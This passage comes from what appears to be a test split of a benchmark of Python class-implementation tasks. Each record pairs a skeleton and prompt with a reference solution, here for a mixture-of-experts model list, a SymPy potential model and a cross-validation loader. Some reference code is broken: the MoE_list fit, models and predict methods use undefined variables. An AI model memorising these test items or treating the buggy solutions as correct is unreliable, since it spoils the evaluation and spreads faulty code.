Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n<|end_body_0|>\n\n<|body_start_1|>\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n<|end_body_3|>\n\n<|body_start_4|>\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n<|end_body_4|>\n\n<|body_start_5|>\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n<|end_body_5|>\n", "revision_id": "a786e9ce5845ba1f82980c5265307914c3c26e68", "skeleton": "<|skeleton|>\nclass MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. 
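Two more of this record's bodies contradict their docstrings: `models` computes a default `k_list` and then returns `self.MoE_list[k]` with `k` undefined, and `predict` sizes its output with an undefined `X_test`. Minimal corrections matching the documented behaviour:

    def models(self, k_list=None):
        if k_list is None:
            k_list = range(self.K)
        return [self.MoE_list[k] for k in k_list]   # a list, as the docstring promises

    def predict(self, X):
        assert X.shape[1] == self.D
        y = np.zeros((X.shape[0], self.K))          # was: X_test.shape[0]
        for k in range(self.K):
            y[:, k] = self.MoE_list[k].predict(X)
        return y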
Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. 
Input: folder name of the folder to save files to\"\"\"\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n", "source": "the_stack_v2_python_sparse", "source_path": "dev/tries_checks/routines/MoE_list.py", "source_repo": "stefanoschmidt1995/MLGW", "split": "test", "star_events_count": 12} {"blob_id": "13f5823748aebb5abf21dd55f4d960ce70ecc4d3", "bodies": ["self.Bs = sy.symbols('Bx, By, Bz')\nself.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\nself.indepvars = {s.name: s for s in self.Bs + self.εs}\nself.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))", "invalid_inputs = [q for q in qs if q not in self.indepvars]\nif len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\nsym = symutil.make_function('ϕ', *self.indepvars.values())\nexpr = self.φ\nfor varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\nsym = self.keyify(sym)\nif len(qs):\n expr = symutil.apply_substitutions_in(expr)\nif strip:\n expr = symutil.strip_function_arguments(expr)\nassert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\nreturn (sym, expr)", "ivars = sorted(self.indepvars.keys())\nout = {}\nallqs = []\nif jacobian:\n allqs.extend(((var,) for var in ivars))\nif hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\nfor i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\nreturn out", "expr = recursive_collect(sy.together(sy.expand(expr)))\nexpr = recursive_collect(expr, syms=self.Bs)\nexpr = symutil.collect_const_in(expr)\nreturn expr"], "bodies_text": "<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in 
self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "class_docstring": "Abstract base class for scalar potential models using (B, ε).", "class_name": "PotentialModelBase", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. 
Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000333", "length_bytes": 8995, "license_type": "permissive", "methods": [{"docstring": "Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",", "name": "dφdq", "signature": "def dφdq(self, qs, strip)"}, {"docstring": "Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) 
Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.", "name": "dφdqs", "signature": "def dφdqs(self, jacobian=True, hessian=True)"}, {"docstring": "Simplify expr. Specifically geared to optimize expressions treated by this class.", "name": "simplify", "signature": "def simplify(self, expr)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003178", "prompt": "Implement the Python class `PotentialModelBase` described below.\n\nClass description:\nAbstract base class for scalar potential models using (B, ε).\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\n- def dφdq(self, qs, strip): Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\n- def dφdqs(self, jacobian=True, hessian=True): Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\n- def simplify(self, expr): Simplify expr. Specifically geared to optimize expressions treated by this class.", "prompted_full_text": "Implement the Python class `PotentialModelBase` described below.\n\nClass description:\nAbstract base class for scalar potential models using (B, ε).\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\n- def dφdq(self, qs, strip): Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\n- def dφdqs(self, jacobian=True, hessian=True): Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. 
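The central device in the PotentialModelBase record, differentiating a "layer cake" of applied functions so that the chain rule stays formal, is plain SymPy behaviour; `symutil.make_function` is presumably a thin wrapper over `sy.Function`. A self-contained illustration with generic names:

    import sympy as sy

    x, y = sy.symbols('x y')
    e = sy.Function('e')(x, y)   # applied function e(x, y); its definition is withheld
    phi = e**2 + x*e             # a potential built on top of e

    # The chain rule is applied only formally: the result keeps the
    # unevaluated Derivative(e(x, y), x) instead of expanding e.
    dphi_dx = sy.diff(phi, x)
    print(dphi_dx)
    # -> 2*e(x, y)*Derivative(e(x, y), x) + x*Derivative(e(x, y), x) + e(x, y)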
This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\n- def simplify(self, expr): Simplify expr. Specifically geared to optimize expressions treated by this class.\n\n<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. 
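`simplify` in the same record leans on project helpers (`recursive_collect`, `symutil.collect_const_in`); the underlying pattern is the standard expand -> together -> collect pipeline, keyed on the B symbols. A plain-SymPy approximation of that pipeline:

    import sympy as sy

    Bx, By, eps = sy.symbols('Bx By eps')
    expr = Bx*eps + Bx*eps**2 + By*eps + By*eps**2

    # Expand, put over a common denominator, then gather terms by Bx and By
    # (a rough stand-in for recursive_collect(expr, syms=self.Bs)).
    simplified = sy.collect(sy.together(sy.expand(expr)), [Bx, By])
    print(simplified)   # e.g. Bx*(eps**2 + eps) + By*(eps**2 + eps)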
Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n<|end_body_0|>\n\n<|body_start_1|>\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n<|end_body_1|>\n\n<|body_start_2|>\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n<|end_body_2|>\n\n<|body_start_3|>\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n<|end_body_3|>\n", "revision_id": "02d97557e08cbeb3d53470934f471a6ede723570", "skeleton": "<|skeleton|>\nclass PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n <|body_0|>\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n <|body_1|>\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. 
hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n <|body_2|>\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PotentialModelBase:\n \"\"\"Abstract base class for scalar potential models using (B, ε).\"\"\"\n\n def __init__(self):\n \"\"\"Constructor. Sets up the independent variables B, ε, and the deviatoric strain e = e(ε).\"\"\"\n self.Bs = sy.symbols('Bx, By, Bz')\n self.εs = sy.symbols('εxx, εyy, εzz, εyz, εzx, εxy')\n self.indepvars = {s.name: s for s in self.Bs + self.εs}\n self.es = tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n\n def simplify(self, expr):\n \"\"\"Simplify expr. 
Specifically geared to optimize expressions treated by this class.\"\"\"\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n", "source": "the_stack_v2_python_sparse", "source_path": "potentialmodelbase.py", "source_repo": "TUTElectromechanics/mm-codegen", "split": "test", "star_events_count": 2} {"blob_id": "e35296fdfba9054950bdc5af8628adc9e619d210", "bodies": ["assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\nself.cv_iters = cv_iters\ndatapath = './Data'\nself.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\nself.Ind = np.arange(len(self.dataset))\nself.shuffle()", "random.seed(231)\nrandom.shuffle(self.Ind)\nself.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\nself.CVindex = 1\nself.Testindex = 0", "next_test = False\nif self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\nelse:\n self.CVindex = 0\n next_test = True\nif next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n 